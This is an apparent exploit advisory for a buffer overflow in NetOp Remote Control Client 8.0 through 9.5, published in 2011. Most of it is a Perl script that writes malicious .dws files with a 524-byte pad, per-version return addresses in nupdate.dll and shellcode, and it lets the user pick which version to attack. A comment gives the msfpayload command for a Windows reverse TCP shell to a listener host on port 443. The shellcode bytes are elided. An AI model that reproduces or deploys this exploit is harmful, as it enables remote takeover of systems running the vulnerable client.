NetOp Remote Control Client Buffer Overflow Exploit

Summary

NetOp Remote Control Client 9.5 suffers from a buffer overflow vulnerability.

Credit:

The information has been provided by chap0.


Details

Vulnerable Systems:
 * NetOp Remote Control Client 9.5

# Output file name for each targeted NetOp version
$file0 = 'netop80.dws';
$file1 = 'netop91.dws';
$file2 = 'netop92.dws';
$file3 = 'netop95.dws';

# 524 bytes of padding placed ahead of the overwrite value
my $junk = "\x41" x 524;

# Per-version overwrite values (little-endian), all inside nupdate.dll
my $ret0 = "\x9B\xC2\x40\x20"; #0x2040C29B [nupdate.dll]
my $ret1 = "\xB3\xE9\x3D\x20"; #0x203DE9B3 [nupdate.dll]
my $ret2 = "\x1B\xFC\x44\x20"; #0x2044FC1B [nupdate.dll]
my $ret3 = "\x13\x26\xB5\x20"; #0x20B52613 [nupdate.dll]

my $extra = "\x41" x 20;

#./msfpayload windows/shell_reverse_tcp LHOST=172.16.20.27 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
#[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

my $shellcode = '';  # payload bytes elided

print<<EOF;
NetOp Remote Control Buffer Overflow
By chap0 - www.seek-truth.net
Choose a number for the version of NetOp are you attacking:
0 - NetOp 8.0
1 - NetOp 9.1
2 - NetOp 9.2
3 - Netop 9.5

EOF

print 'Selection: ';
chomp ($select = <STDIN>);

# Each branch writes padding + overwrite value + filler + payload to the
# .dws file for the selected version.
if ($select eq '0') {

print "Creating payload for NetOp 8.0\n";

my $payload=$junk.$ret0.$extra.$shellcode;

open(FILE,">$file0") or die "Cannot write $file0: $!\n";
print FILE $payload;
close(FILE);

print "Done.\n";

}

elsif ($select eq '1') {

print "Creating payload for NetOp 9.1\n";

my $payload=$junk.$ret1.$extra.$shellcode;

open(FILE,">$file1") or die "Cannot write $file1: $!\n";
print FILE $payload;
close(FILE);

print "Done.\n";

}

elsif ($select eq '2') {

print "Creating payload for NetOp 9.2\n";

my $payload=$junk.$ret2.$extra.$shellcode;

open(FILE,">$file2") or die "Cannot write $file2: $!\n";
print FILE $payload;
close(FILE);

print "Done.\n";

}

elsif ($select eq '3') {

print "Creating payload for NetOp 9.5\n";

my $payload=$junk.$ret3.$extra.$shellcode;

open(FILE,">$file3") or die "Cannot write $file3: $!\n";
print FILE $payload;
close(FILE);

print "Done.\n";

}

# Empty or unrecognised input
else {

print "Please make a selection.\n";

}

Disclosure Timeline:
Published: 2011-04-28
